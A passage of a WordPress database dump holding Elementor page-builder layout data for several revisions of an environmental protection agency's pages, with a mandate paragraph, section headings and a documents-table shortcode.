column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"tax:resource_tag\\\":\\\"epa\\\"\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12147,1971,'_elementor_edit_mode','builder'),(12148,1971,'_elementor_template_type','wp-post'),(12149,1971,'_elementor_version','2.7.5'),(12150,1971,'_wp_page_template','default'),(12151,1971,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"resource_tag\\\":\\\"epa\\\"\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12154,1972,'_elementor_edit_mode','builder'),(12155,1972,'_elementor_template_type','wp-post'),(12156,1972,'_elementor_version','2.7.5'),(12157,1972,'_wp_page_template','default'),(12158,1972,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" terms=\\\"<resource_tag>\\\":\\\"<epa>\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12162,1973,'_elementor_edit_mode','builder'),(12163,1973,'_elementor_template_type','wp-post'),(12164,1973,'_elementor_version','2.7.5'),(12165,1973,'_wp_page_template','default'),(12166,1973,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\" term=\\\"<resource_tag>\\\":\\\"<epa>\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12170,1974,'_elementor_edit_mode','builder'),(12171,1974,'_elementor_template_type','wp-post'),(12172,1974,'_elementor_version','2.7.5'),(12173,1974,'_wp_page_template','default'),(12174,1974,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\